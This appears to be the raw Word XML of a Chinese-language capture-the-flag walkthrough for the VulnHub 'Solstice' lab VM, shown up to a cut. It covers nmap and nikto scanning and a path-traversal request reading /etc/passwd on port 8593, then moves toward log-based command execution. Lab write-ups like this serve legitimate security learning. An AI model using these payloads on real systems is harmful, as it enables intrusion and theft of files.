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8B371" w14:textId="476B25C1" w:rsidR="0022109E" w:rsidRDefault="00EC2015" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk144232693"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00EC2015">
        <w:t>Solstice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5B4155" w14:textId="736A3E7D" w:rsidR="00EC2015" w:rsidRDefault="00EC2015" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EC2015">
        <w:instrText>https://download.vulnhub.com/sunset/solstice.ova</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00EF10A4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>https://download.vulnhub.com/sunset/solstice.ova</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C371A14" w14:textId="77777777" w:rsidR="00EC2015" w:rsidRDefault="00EC2015" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB1C085" w14:textId="08756F83" w:rsidR="00EC2015" w:rsidRDefault="00EC2015" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Yu Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3F9ABC" w14:textId="5C087064" w:rsidR="00EC2015" w:rsidRDefault="00E81B44" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E81B44">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E81B44">
        <w:t>-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2457E4E1" w14:textId="1010C6F9" w:rsidR="00E81B44" w:rsidRDefault="00E81B44" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E81B44">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EADF72D" wp14:editId="6608DFCC">
            <wp:extent cx="5274310" cy="1423670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="122540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07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372D" w14:textId="702AF1D1" w:rsidR="00E81B44" w:rsidRDefault="00E81B44" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3EBD50" w14:textId="56150A20" w:rsidR="00E81B44" w:rsidRDefault="00E81B44" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E81B44">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E81B44">
        <w:t xml:space="preserve"> --min-rate 10000 -p- 192.168.21.147</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D2432" w14:textId="3090AE5B" w:rsidR="00E81B44" w:rsidRDefault="00C6485F" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C6485F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="397DAD5B" wp14:editId="182FA52B">
            <wp:extent cx="5274310" cy="3472180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2141011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11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545" w14:textId="0056DB19" w:rsidR="00FD4FD8" w:rsidRDefault="00FD4FD8" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里端口有太多于是我就整理了一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3ED8BF" w14:textId="471EC585" w:rsidR="00FD4FD8" w:rsidRDefault="00FD4FD8" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD4FD8">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD4FD8">
        <w:t xml:space="preserve"> --min-rate 10000 -p- 192.168.21.147 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD4FD8">
        <w:t>oA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD4FD8">
        <w:t xml:space="preserve"> ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F926AB1" w14:textId="2516378F" w:rsidR="00FD4FD8" w:rsidRDefault="00FD4FD8" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD4FD8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="605E1D9F" wp14:editId="10C6D498">
            <wp:extent cx="5274310" cy="3289300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1038345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5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413B" w14:textId="4860C7A5" w:rsidR="00FD4FD8" w:rsidRDefault="00FD4FD8" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据整理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4AB0A5" w14:textId="319E1C3D" w:rsidR="00FD4FD8" w:rsidRDefault="00FD4FD8" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD4FD8">
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD4FD8">
        <w:t>ports.nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD4FD8">
        <w:t>|grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD4FD8">
        <w:t xml:space="preserve"> open |awk -F '/' '{print $1}' |tr '\n' ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A65A9F9" w14:textId="33C81E1C" w:rsidR="00FD4FD8" w:rsidRDefault="00FD4FD8" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD4FD8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F37F89B" wp14:editId="708A209E">
            <wp:extent cx="5274310" cy="593090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="916190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0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B527" w14:textId="2E1738F4" w:rsidR="00C6485F" w:rsidRDefault="001F72B2" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C80739F" w14:textId="663F6148" w:rsidR="001F72B2" w:rsidRDefault="001F72B2" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F72B2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F72B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F72B2">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F72B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F72B2">
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F72B2">
        <w:t xml:space="preserve"> -O -p21,22,25,80,139,445,2121,3128,8593,54787,62524 192.168.21.147</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1754BC" w14:textId="7F2A8FF4" w:rsidR="001F72B2" w:rsidRDefault="001F72B2" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001F72B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EE17935" wp14:editId="0F91B3ED">
            <wp:extent cx="5274310" cy="3056255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="98997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78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7F33" w14:textId="6A164D79" w:rsidR="001F72B2" w:rsidRDefault="001F72B2" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448E41D5" w14:textId="5986F038" w:rsidR="001F72B2" w:rsidRDefault="001F72B2" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F72B2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F72B2">
        <w:t xml:space="preserve"> --script=vuln -p21,22,25,80,139,445,2121,3128,8593,54787,62524 192.168.21.147</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C01725" w14:textId="67ED6EF5" w:rsidR="001F72B2" w:rsidRDefault="001F72B2" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001F72B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AC69D66" wp14:editId="2EC6871C">
            <wp:extent cx="5274310" cy="3768725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="372682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82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DA6" w14:textId="6CAF2101" w:rsidR="00E633CF" w:rsidRDefault="00E633CF" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ve</w:t>
      </w:r>
      <w:r>
        <w:t>-2010-1344</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226583AF" w14:textId="18B02497" w:rsidR="00E633CF" w:rsidRDefault="00E633CF" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E633CF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="387860FD" wp14:editId="502C1CCD">
            <wp:extent cx="5274310" cy="1952625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="546241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41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099C" w14:textId="670D9129" w:rsidR="00E633CF" w:rsidRDefault="00E633CF" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒接登入=废的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABC9330" w14:textId="77777777" w:rsidR="00E633CF" w:rsidRDefault="00E633CF" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F67580D" w14:textId="77777777" w:rsidR="00E633CF" w:rsidRDefault="00E633CF" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E633CF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F1FEBE3" wp14:editId="36A94805">
            <wp:extent cx="5274310" cy="1340485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1259446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46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CCBB" w14:textId="77777777" w:rsidR="00E633CF" w:rsidRDefault="00E633CF" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说白了啥都没有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ACE0F6" w14:textId="607AD12F" w:rsidR="00E633CF" w:rsidRDefault="005A3873" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意一下</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的服务其他的端口也会有web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459A3A87" w14:textId="78889162" w:rsidR="005A3873" w:rsidRDefault="005A3873" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005A3873">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A3E5B88" wp14:editId="354A3EDB">
            <wp:extent cx="5136325" cy="1714649"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1170722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22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7BF6" w14:textId="43FF393B" w:rsidR="005A3873" w:rsidRDefault="005A3873" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005A3873">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="314374CF" wp14:editId="78242D6E">
            <wp:extent cx="5274310" cy="2178685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="25612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2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30B" w14:textId="7D471809" w:rsidR="005A3873" w:rsidRDefault="005A3873" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>纯白没有意义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A7E59E" w14:textId="70AAD1A4" w:rsidR="005A3873" w:rsidRDefault="005A3873" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对8</w:t>
      </w:r>
      <w:r>
        <w:t>593</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下手</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093A1695" w14:textId="52C24C63" w:rsidR="005A3873" w:rsidRDefault="005A3873" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有任何提示我们需要漏洞扫描了</w:t>
      </w:r>
      <w:r w:rsidR="00EF6DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，网上找找就能找到自带的漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345BF715" w14:textId="011F59E9" w:rsidR="005A3873" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF6DB0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AC8E808" wp14:editId="0DD48F6C">
            <wp:extent cx="5274310" cy="6269990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2005699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9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B47B" w14:textId="1861D464" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE9479A" w14:textId="65592869" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF6DB0">
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF6DB0">
        <w:t xml:space="preserve"> -host 192.168.21.147</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CAD7C0" w14:textId="43CCDA80" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF6DB0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24E7444E" wp14:editId="5983D4CD">
            <wp:extent cx="5274310" cy="1837690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1569231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1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3F49" w14:textId="315D0F3B" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>敏感目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5131854D" w14:textId="1429811A" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF6DB0">
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF6DB0">
        <w:t xml:space="preserve"> -host </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="006654AE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.21.147/dvwa</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BDC95A8" w14:textId="59AEAF64" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF6DB0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D8B66C6" wp14:editId="453A8BFF">
            <wp:extent cx="5274310" cy="1610995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1342494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94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AD06" w14:textId="29BCD2D3" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>突破口大概率是8</w:t>
      </w:r>
      <w:r>
        <w:t>593</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6993E4CB" w14:textId="385EA7FF" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于是指定端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57611A" w14:textId="657DC4CE" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF6DB0">
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF6DB0">
        <w:t xml:space="preserve"> -host 192.168.21.147 -p 8593</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D34095" w14:textId="59EB578B" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF6DB0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="348A5D7E" wp14:editId="7E1A0557">
            <wp:extent cx="5274310" cy="1927860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="624911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11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3880" w14:textId="4A42E647" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF6DB0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="038904F8" wp14:editId="4E3A1C1D">
            <wp:extent cx="5274310" cy="1835150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="119002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29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1453" w14:textId="3F934D11" w:rsidR="00EF6DB0" w:rsidRDefault="00EF6DB0" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意文件读取？试一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B1C07D" w14:textId="699348F1" w:rsidR="00EF6DB0" w:rsidRDefault="00862512" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>192.168.21.147:8593/index.php</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>?book=/../../../../etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65079059" w14:textId="1D87817A" w:rsidR="00862512" w:rsidRDefault="00862512" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接式一个一个加</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A07B1" w14:textId="707F1F4B" w:rsidR="00862512" w:rsidRDefault="00862512" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00862512">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57E067A5" wp14:editId="3034FA73">
            <wp:extent cx="5274310" cy="1468755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="461820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20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1174" w14:textId="5A331563" w:rsidR="00EF6DB0" w:rsidRDefault="00862512" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这里已经发现漏洞了那么，服务器又是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就需要知道</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的敏感文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6925B0BC" w14:textId="744A5B03" w:rsidR="00862512" w:rsidRDefault="00862512" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般就是看有没有日志能看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E3182" w14:textId="17CE19A4" w:rsidR="00862512" w:rsidRDefault="00862512" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00862512">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58BA5CF4" wp14:editId="33CD3C05">
            <wp:extent cx="5274310" cy="3512820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="609098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98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6D35" w14:textId="2E72BBFB" w:rsidR="00862512" w:rsidRDefault="009931A4" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009931A4">
        <w:t>PHPSESSID=pfkvbugcndb8fglu2i75jlnlsu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C781EAC" w14:textId="4381C167" w:rsidR="009931A4" w:rsidRDefault="009931A4" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿到</w:t>
      </w:r>
      <w:r w:rsidRPr="009931A4">
        <w:t>PHPSESSID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直接开搜</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738238C8" w14:textId="112A2D3D" w:rsidR="009931A4" w:rsidRDefault="009931A4" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009931A4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A16458B" wp14:editId="412E50B9">
            <wp:extent cx="5274310" cy="5543550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="991662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626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AEB9" w14:textId="5B6B00A0" w:rsidR="009931A4" w:rsidRDefault="009931A4" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不用说就是命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B367B6" w14:textId="29F92E83" w:rsidR="009931A4" w:rsidRDefault="009931A4" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
